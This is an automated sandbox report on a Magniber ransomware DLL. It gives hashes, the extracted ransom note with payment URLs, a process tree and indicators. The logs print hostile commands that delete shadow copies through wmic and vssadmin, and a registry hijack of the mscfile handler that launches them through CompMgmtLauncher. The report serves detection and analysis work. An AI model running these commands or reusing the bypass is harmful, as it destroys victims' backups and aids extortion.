magniber | 3aec49fb761581a0b95e23b1a85b8594308491968d42d04831ae01f8949b05b4

Analysis

max time kernel
144s
max time network
183s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
30-11-2022 10:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0362769fcb15c6e11528373bb98a572e.dll
Size

42KB
MD5

0362769fcb15c6e11528373bb98a572e
SHA1

62f14e27becef8c7c889e5083c0341992e4bd57b
SHA256

3aec49fb761581a0b95e23b1a85b8594308491968d42d04831ae01f8949b05b4
SHA512

e6d739263194c61f73fc56127317e58e43caefce11294d8f0462d3891fdc142179d84844350536648d0ecde58253f64c26c017755f0a60eb79d6dbe7b07434e1
SSDEEP

768:MeEfWZ7x3IEnQL31NFCZQzjHfywPvMeWQGMdUU/YUze//Ywu+k:MeEfWxmCQLI+zjHKKvMMqvUzenYwzk

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://02bc488022xdbbxfvjy.hjew6l4r3hpgj7qiloum5j7jwq7q3623v4fsbq5edbckeppeetpiihid.onion/xdbbxfvjy Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://02bc488022xdbbxfvjy.gunfail.quest/xdbbxfvjy http://02bc488022xdbbxfvjy.raredoe.uno/xdbbxfvjy http://02bc488022xdbbxfvjy.gaplies.fit/xdbbxfvjy http://02bc488022xdbbxfvjy.ranmuch.space/xdbbxfvjy Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://02bc488022xdbbxfvjy.hjew6l4r3hpgj7qiloum5j7jwq7q3623v4fsbq5edbckeppeetpiihid.onion/xdbbxfvjy

http://02bc488022xdbbxfvjy.gunfail.quest/xdbbxfvjy

http://02bc488022xdbbxfvjy.raredoe.uno/xdbbxfvjy

http://02bc488022xdbbxfvjy.gaplies.fit/xdbbxfvjy

http://02bc488022xdbbxfvjy.ranmuch.space/xdbbxfvjy

Signatures

Detect magniber ransomware 2 IoCs

resource	yara_rule
behavioral1/memory/1980-54-0x0000000000090000-0x0000000000095000-memory.dmp	family_magniber
behavioral1/memory/1124-55-0x00000000001D0000-0x00000000001D5000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2032	1072	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1940	1072	cmd.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2104	1072	cmd.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2080	1072	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2260	1072	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2380	1072	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2808	1072	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2848	1072	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2836	1072	cmd.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2800	1072	cmd.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1320	1072	vssadmin.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1444	1072	vssadmin.exe	37

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\MeasureLock.crw => C:\Users\Admin\Pictures\MeasureLock.crw.xdbbxfvjy	taskhost.exe
File renamed	C:\Users\Admin\Pictures\SearchTrace.raw => C:\Users\Admin\Pictures\SearchTrace.raw.xdbbxfvjy	taskhost.exe
File renamed	C:\Users\Admin\Pictures\RegisterSkip.png => C:\Users\Admin\Pictures\RegisterSkip.png.xdbbxfvjy	taskhost.exe
File opened for modification	C:\Users\Admin\Pictures\RemoveWrite.tiff	taskhost.exe
File renamed	C:\Users\Admin\Pictures\MountRemove.crw => C:\Users\Admin\Pictures\MountRemove.crw.xdbbxfvjy	taskhost.exe
File renamed	C:\Users\Admin\Pictures\RemoveWrite.tiff => C:\Users\Admin\Pictures\RemoveWrite.tiff.xdbbxfvjy	taskhost.exe
File opened for modification	C:\Users\Admin\Pictures\SearchWatch.tiff	taskhost.exe
File renamed	C:\Users\Admin\Pictures\SearchWatch.tiff => C:\Users\Admin\Pictures\SearchWatch.tiff.xdbbxfvjy	taskhost.exe
File renamed	C:\Users\Admin\Pictures\SendConvertTo.tif => C:\Users\Admin\Pictures\SendConvertTo.tif.xdbbxfvjy	taskhost.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1980 set thread context of 1124	1980	rundll32.exe	4
PID 1980 set thread context of 1204	1980	rundll32.exe	13
PID 1980 set thread context of 1280	1980	rundll32.exe	11

Interacts with shadow copies 2 TTPs 8 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
2032	vssadmin.exe
2080	vssadmin.exe
2260	vssadmin.exe
2380	vssadmin.exe
2808	vssadmin.exe
2848	vssadmin.exe
1320	vssadmin.exe
1444	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FF6066C1-70A5-11ED-882B-42F1C931D1AB} = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376574354"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c04490f6b204d901	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fbec07815684004d899a318f710de6af0000000002000000000010660000000100002000000033110f1e4f12b674cb0c7cdc805317cf4366c52418a674657421f30ab0889286000000000e8000000002000020000000f6e07c760fcd35447d58055da4b2b552b763553930c886049d3acd89edd37f9d2000000070dac13f6665edc4cc7b8b4cb59ea5abff64039e6c8485229524afa3bd68e93f40000000693ddeeb9b620149e70cf49787f46daeb9f5b5d1d2816515bfd2ab54b67e3c3e550b3caea0f6b31dca7fcf4a468de26c737eba162790b56366f7aa4aebafad5d	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fbec07815684004d899a318f710de6af0000000002000000000010660000000100002000000036f36d898dc97745e3261bef2db6e87d9954850e94272f47cc43ceea6e811dd5000000000e8000000002000020000000c16d01772c00c02c3de1a74aa7041ea1b7a018f2bbaea21796f006d34fc59b75900000008d3626cf37c914b52b64c5ac459f28369e4bc77fed0df24b9687619ae3a7c2b471620b95695a565a800842d1f329155532f2a4bb3a0e070de85d7204dc19ff523e32ac1703fac053f6d1687c7c145e25fe8f62fe7cdcaffc008b80c6a538d6fcffc9795ad8ca5e6c01abea5bf7df17cc04e089386c4bc109c3d79bed60ecbd904eb5c4fe324cc9a30ec2392155d77647400000005aecf4ce8aeb27e49b8269f34becc96d0775f6c03fa4287bb3b51f24b1401deb6a8ccf122ff0990bf4b98aaf687a69acdcb4b67fc6f60e53fa49d90e26866510	iexplore.exe

Modifies registry class 11 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Dwm.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\mscfile\shell	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\mscfile\shell\open	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\mscfile\shell\open\command	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\mscfile\shell\open\command	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\mscfile	taskhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\mscfile\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000_CLASSES\mscfile\shell\open\command	Dwm.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
756	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1980	rundll32.exe
1980	rundll32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1280	Explorer.EXE

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
1980	rundll32.exe
1980	rundll32.exe
1980	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1280	Explorer.EXE
Token: SeShutdownPrivilege	1280	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1988	wmic.exe
Token: SeSecurityPrivilege	1988	wmic.exe
Token: SeTakeOwnershipPrivilege	1988	wmic.exe
Token: SeLoadDriverPrivilege	1988	wmic.exe
Token: SeSystemProfilePrivilege	1988	wmic.exe
Token: SeSystemtimePrivilege	1988	wmic.exe
Token: SeProfSingleProcessPrivilege	1988	wmic.exe
Token: SeIncBasePriorityPrivilege	1988	wmic.exe
Token: SeCreatePagefilePrivilege	1988	wmic.exe
Token: SeBackupPrivilege	1988	wmic.exe
Token: SeRestorePrivilege	1988	wmic.exe
Token: SeShutdownPrivilege	1988	wmic.exe
Token: SeDebugPrivilege	1988	wmic.exe
Token: SeSystemEnvironmentPrivilege	1988	wmic.exe
Token: SeRemoteShutdownPrivilege	1988	wmic.exe
Token: SeUndockPrivilege	1988	wmic.exe
Token: SeManageVolumePrivilege	1988	wmic.exe
Token: 33	1988	wmic.exe
Token: 34	1988	wmic.exe
Token: 35	1988	wmic.exe
Token: SeShutdownPrivilege	1280	Explorer.EXE
Token: SeShutdownPrivilege	1280	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1780	WMIC.exe
Token: SeSecurityPrivilege	1780	WMIC.exe
Token: SeTakeOwnershipPrivilege	1780	WMIC.exe
Token: SeLoadDriverPrivilege	1780	WMIC.exe
Token: SeSystemProfilePrivilege	1780	WMIC.exe
Token: SeSystemtimePrivilege	1780	WMIC.exe
Token: SeProfSingleProcessPrivilege	1780	WMIC.exe
Token: SeIncBasePriorityPrivilege	1780	WMIC.exe
Token: SeCreatePagefilePrivilege	1780	WMIC.exe
Token: SeBackupPrivilege	1780	WMIC.exe
Token: SeRestorePrivilege	1780	WMIC.exe
Token: SeShutdownPrivilege	1780	WMIC.exe
Token: SeDebugPrivilege	1780	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1780	WMIC.exe
Token: SeRemoteShutdownPrivilege	1780	WMIC.exe
Token: SeUndockPrivilege	1780	WMIC.exe
Token: SeManageVolumePrivilege	1780	WMIC.exe
Token: 33	1780	WMIC.exe
Token: 34	1780	WMIC.exe
Token: 35	1780	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1988	wmic.exe
Token: SeSecurityPrivilege	1988	wmic.exe
Token: SeTakeOwnershipPrivilege	1988	wmic.exe
Token: SeLoadDriverPrivilege	1988	wmic.exe
Token: SeSystemProfilePrivilege	1988	wmic.exe
Token: SeSystemtimePrivilege	1988	wmic.exe
Token: SeProfSingleProcessPrivilege	1988	wmic.exe
Token: SeIncBasePriorityPrivilege	1988	wmic.exe
Token: SeCreatePagefilePrivilege	1988	wmic.exe
Token: SeBackupPrivilege	1988	wmic.exe
Token: SeRestorePrivilege	1988	wmic.exe
Token: SeShutdownPrivilege	1988	wmic.exe
Token: SeDebugPrivilege	1988	wmic.exe
Token: SeSystemEnvironmentPrivilege	1988	wmic.exe
Token: SeRemoteShutdownPrivilege	1988	wmic.exe
Token: SeUndockPrivilege	1988	wmic.exe
Token: SeManageVolumePrivilege	1988	wmic.exe
Token: 33	1988	wmic.exe
Token: 34	1988	wmic.exe
Token: 35	1988	wmic.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
1280	Explorer.EXE
1280	Explorer.EXE
1760	iexplore.exe
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1760	iexplore.exe
1760	iexplore.exe
2192	IEXPLORE.EXE
2192	IEXPLORE.EXE
2192	IEXPLORE.EXE
2192	IEXPLORE.EXE

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
1280	Explorer.EXE
1280	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1124 wrote to memory of 756	1124	taskhost.exe	29
PID 1124 wrote to memory of 756	1124	taskhost.exe	29
PID 1124 wrote to memory of 756	1124	taskhost.exe	29
PID 1124 wrote to memory of 1952	1124	taskhost.exe	30
PID 1124 wrote to memory of 1952	1124	taskhost.exe	30
PID 1124 wrote to memory of 1952	1124	taskhost.exe	30
PID 1124 wrote to memory of 1988	1124	taskhost.exe	31
PID 1124 wrote to memory of 1988	1124	taskhost.exe	31
PID 1124 wrote to memory of 1988	1124	taskhost.exe	31
PID 1124 wrote to memory of 836	1124	taskhost.exe	34
PID 1124 wrote to memory of 836	1124	taskhost.exe	34
PID 1124 wrote to memory of 836	1124	taskhost.exe	34
PID 836 wrote to memory of 1780	836	cmd.exe	36
PID 836 wrote to memory of 1780	836	cmd.exe	36
PID 836 wrote to memory of 1780	836	cmd.exe	36
PID 1952 wrote to memory of 1760	1952	cmd.exe	41
PID 1952 wrote to memory of 1760	1952	cmd.exe	41
PID 1952 wrote to memory of 1760	1952	cmd.exe	41
PID 1940 wrote to memory of 1172	1940	cmd.exe	43
PID 1940 wrote to memory of 1172	1940	cmd.exe	43
PID 1940 wrote to memory of 1172	1940	cmd.exe	43
PID 1280 wrote to memory of 1256	1280	Explorer.EXE	45
PID 1280 wrote to memory of 1256	1280	Explorer.EXE	45
PID 1280 wrote to memory of 1256	1280	Explorer.EXE	45
PID 1280 wrote to memory of 1836	1280	Explorer.EXE	51
PID 1280 wrote to memory of 1836	1280	Explorer.EXE	51
PID 1280 wrote to memory of 1836	1280	Explorer.EXE	51
PID 1836 wrote to memory of 840	1836	cmd.exe	48
PID 1836 wrote to memory of 840	1836	cmd.exe	48
PID 1836 wrote to memory of 840	1836	cmd.exe	48
PID 1172 wrote to memory of 584	1172	CompMgmtLauncher.exe	52
PID 1172 wrote to memory of 584	1172	CompMgmtLauncher.exe	52
PID 1172 wrote to memory of 584	1172	CompMgmtLauncher.exe	52
PID 2104 wrote to memory of 2160	2104	cmd.exe	58
PID 2104 wrote to memory of 2160	2104	cmd.exe	58
PID 2104 wrote to memory of 2160	2104	cmd.exe	58
PID 1760 wrote to memory of 2192	1760	iexplore.exe	59
PID 1760 wrote to memory of 2192	1760	iexplore.exe	59
PID 1760 wrote to memory of 2192	1760	iexplore.exe	59
PID 1760 wrote to memory of 2192	1760	iexplore.exe	59
PID 2160 wrote to memory of 2288	2160	CompMgmtLauncher.exe	62
PID 2160 wrote to memory of 2288	2160	CompMgmtLauncher.exe	62
PID 2160 wrote to memory of 2288	2160	CompMgmtLauncher.exe	62
PID 1980 wrote to memory of 2568	1980	rundll32.exe	67
PID 1980 wrote to memory of 2568	1980	rundll32.exe	67
PID 1980 wrote to memory of 2568	1980	rundll32.exe	67
PID 1204 wrote to memory of 2580	1204	Dwm.exe	68
PID 1204 wrote to memory of 2580	1204	Dwm.exe	68
PID 1204 wrote to memory of 2580	1204	Dwm.exe	68
PID 1980 wrote to memory of 2592	1980	rundll32.exe	70
PID 1980 wrote to memory of 2592	1980	rundll32.exe	70
PID 1980 wrote to memory of 2592	1980	rundll32.exe	70
PID 1204 wrote to memory of 2604	1204	Dwm.exe	69
PID 1204 wrote to memory of 2604	1204	Dwm.exe	69
PID 1204 wrote to memory of 2604	1204	Dwm.exe	69
PID 2604 wrote to memory of 2688	2604	cmd.exe	75
PID 2604 wrote to memory of 2688	2604	cmd.exe	75
PID 2604 wrote to memory of 2688	2604	cmd.exe	75
PID 2592 wrote to memory of 2700	2592	cmd.exe	76
PID 2592 wrote to memory of 2700	2592	cmd.exe	76
PID 2592 wrote to memory of 2700	2592	cmd.exe	76
PID 2800 wrote to memory of 2916	2800	cmd.exe	85
PID 2800 wrote to memory of 2916	2800	cmd.exe	85
PID 2800 wrote to memory of 2916	2800	cmd.exe	85

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1124
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:756
- C:\Windows\system32\cmd.exe
  cmd /c "start http://02bc488022xdbbxfvjy.gunfail.quest/xdbbxfvjy^&1^&45385968^&83^&284^&12"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1952
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://02bc488022xdbbxfvjy.gunfail.quest/xdbbxfvjy&1&45385968&83&284&12
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1760
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1760 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2192
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1988
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:836
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1780

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1280
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\0362769fcb15c6e11528373bb98a572e.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1980
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2568
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2592
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      4⤵
      PID:2700
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1256
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1836

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1204
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2580
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2604
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:2688

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2032

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1940
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1172
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:584

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1324

C:\Windows\system32\wbem\WMIC.exe
C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
1⤵
PID:840

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2104
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2160
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2288

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2080

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2260

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2380

